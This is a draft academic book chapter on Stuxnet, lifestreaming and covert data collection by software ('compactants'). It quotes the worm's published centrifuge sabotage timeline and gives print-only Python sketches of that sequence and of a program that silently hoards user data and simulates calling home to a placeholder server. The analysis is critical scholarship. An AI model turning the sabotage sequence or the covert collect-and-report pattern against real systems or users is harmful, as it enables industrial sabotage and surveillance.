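&amp;lt;/pre&amp;gt; &lt;br /&gt;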
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
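&lt;br /&gt;
Zetter's description amounts to a small finite state machine, which can be rendered schematically in Python (a simulation of the published timeline only, with the waiting periods expressed in minutes; it controls nothing): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import itertools

# The attack timeline reported by Zetter (2011) as a schematic state machine.
# This only replays the published sequence; it controls nothing.
NOMINAL = 1064  # Hz, the nominal enrichment frequency
sequence = itertools.cycle([
    ('overspeed', 1410, 15),             # push towards the rotor limit, ~15 minutes
    ('nominal', NOMINAL, 27 * 24 * 60),  # then roughly 27 quiet days
    ('slowdown', 2, 50),                 # drop to 2 Hz for around 50 minutes
    ('nominal', NOMINAL, 27 * 24 * 60),  # another 27 quiet days, then repeat
])

for state, frequency, minutes in itertools.islice(sequence, 6):
    # The real worm also replayed recorded sensor data, so operators
    # saw nothing but nominal readings while this ran.
    print(state, '-', frequency, 'Hz for', minutes, 'minutes')
&amp;lt;/pre&amp;gt; &lt;br /&gt;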
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have needed to work on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet were: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location; indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and provide a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed slowly to reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuges, faking industrial process control sensor signals by modelling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010, and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
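&lt;br /&gt;
As an aside on method: the simplest of the reverse-engineering techniques mentioned above, pulling printable strings out of a binary, can be sketched in a few lines of Python (in the spirit of the Unix strings utility; the file name below is a placeholder rather than a claim about the actual analysis). It is exactly this kind of pass that brings give-away artefacts, such as the 'myrtus' path string, to light: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import re
import string

def extract_strings(path, min_len=6):
    # Pull runs of printable ASCII out of a binary, like the Unix strings tool.
    data = open(path, 'rb').read()
    printable = re.escape(string.printable.strip().encode())
    pattern = b'[' + printable + b']{%d,}' % min_len
    return [s.decode('ascii') for s in re.findall(pattern, data)]

# Hypothetical usage: scan a suspect driver for give-away artefacts.
for s in extract_strings('mrxnet.sys'):
    if 'myrtus' in s.lower():
        print(s)
&amp;lt;/pre&amp;gt; &lt;br /&gt;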
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and, in a very short time, learn techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up part of these assemblages. In the next section I want to look at willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified-self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies, called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time streams’ platforms like Twitter and Facebook have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as the ‘real-time streams’ and timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates epitomized by Twitter, with its short, text-message-sized updates of 140 characters. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect data about himself systematically. As he explains, he started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
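&lt;br /&gt;
Freeman's description translates almost directly into a data structure: a time-ordered list of documents plus a handful of operators. A minimal Python sketch (the documents are invented; only the standard library is used): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
from datetime import datetime, timedelta

# A lifestream as a time-ordered list of documents (after Freeman, 2000).
now = datetime(2012, 4, 18, 12, 0)
lifestream = [
    {'time': now - timedelta(days=400), 'kind': 'mail', 'text': 'conference invitation'},
    {'time': now - timedelta(days=2), 'kind': 'note', 'text': 'draft introduction'},
    {'time': now + timedelta(days=1), 'kind': 'todo', 'text': 'reminder: revise essay'},
]

def substream(stream, kind):
    # 'Organize on demand': filter the stream rather than file documents away.
    return [d for d in stream if d['kind'] == kind]

def up_to_present(stream, at):
    # Everything up to 'now'; later items form the stream's future tail.
    return [d for d in stream if d['time'] &amp;amp;lt;= at]

print(substream(lifestream, 'todo'))
print(len(up_to_present(lifestream, now)), 'documents so far')
&amp;lt;/pre&amp;gt; &lt;br /&gt;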
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
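Encoded, the working group's example is just a small piece of structured data. A sketch in Python, following the general shape of the JSON serialisation of Activity Streams 1.0 (the field values here are invented around the quoted example): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json

# The quoted example as an Activity Streams 1.0 style object; the
# timestamps, URLs and names are invented for illustration.
activity = {
    'published': '2011-02-10T15:04:55Z',
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo', 'url': 'http://example.org/album/my_photo.jpg'},
    'target': {'objectType': 'photo-album', 'displayName': 'her album'},
}
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;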
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
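&lt;br /&gt;
Computationally, the comparison against a norm is mundane, as a minimal sketch shows (invented step-count data; the threshold of 1.5 standard deviations is an arbitrary choice for illustration): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
from statistics import mean, stdev

# Invented daily step counts for one user, compared against their own norm.
steps = [8200, 7900, 8400, 8100, 2100, 8300, 7800]

baseline = mean(steps)
spread = stdev(steps)

for day, count in enumerate(steps):
    deviation = (count - baseline) / spread
    if abs(deviation) &amp;amp;gt; 1.5:
        print('day', day, ': unusual activity,', count, 'steps')
&amp;lt;/pre&amp;gt; &lt;br /&gt;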
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticons (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, through a stabilising web of meaning, for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This class of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of the computational agents that are collecting information: they are passive in quality – under the surface, relatively benign and silent – but aggressive in their hoarding of data, monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology from the Latin ''compact'', for closely put together or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are often offloaded to the ‘cloud’ – server computers designed specifically for the task and accessed via networks. Many viruses, for example, seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
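&lt;br /&gt;
By way of illustration only, a minimal sketch in Python of this dichotomous structure might look as follows, with silent collection on the client and processing offloaded elsewhere; the endpoint and field names here are hypothetical, and the reporting is simulated rather than performed over a real network: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of a 'compactant': silent local data-collection on
# one side, periodic reporting ('calling home') for remote aggregation
# and visualisation on the other. Endpoint and fields are hypothetical.
import json
import time

class Compactant:
    def __init__(self, home="https://collector.example.org/ingest"):
        self.home = home      # hypothetical 'cloud' aggregation server
        self.events = []      # passively hoarded behavioural data

    def observe(self, signal, value):
        # Passive mode: silently record a timestamped data-point.
        self.events.append({"t": time.time(), "signal": signal, "value": value})

    def call_home(self):
        # Reporting mode: package the hoard for server-side processing.
        # Here we simply print the payload instead of sending it.
        print(json.dumps({"to": self.home, "events": self.events}))
        self.events = []      # begin a fresh collection cycle

c = Compactant()
c.observe("page_view", "/news")
c.observe("idle_seconds", 42)
c.call_home()
&amp;lt;/pre&amp;gt; &lt;br /&gt;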
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative relation to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard – what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. The past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are therefore often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
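&lt;br /&gt;
To make this temporal structure concrete, here is a small illustrative sketch in Python (not drawn from any particular system): the past is the stored list of data-points, the present is the point being appended, and the future exists as a continuously updatable projection, a simple stand-in for the probabilistic 'code-object' discussed above: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A time-series stream organised as a list, with past (stored data),
# present (the appended point) and future (a naive projection) all
# represented in code. The linear extrapolation is purely illustrative.
import time

class Stream:
    def __init__(self):
        self.points = []                    # the past, as stored data

    def append(self, value):
        self.points.append((time.time(), value))    # the present

    def project(self, horizon_seconds):
        # The future as a code-object: here, a naive linear
        # extrapolation from the last two recorded data-points.
        (t1, v1), (t2, v2) = self.points[-2], self.points[-1]
        rate = (v2 - v1) / (t2 - t1)
        return v2 + rate * horizon_seconds

s = Stream()
s.append(10.0)
time.sleep(0.01)
s.append(10.5)
print(s.project(60))    # projected value one minute ahead
&amp;lt;/pre&amp;gt; &lt;br /&gt;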
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship (ref. 211106), which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organised by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organised by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop at the ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
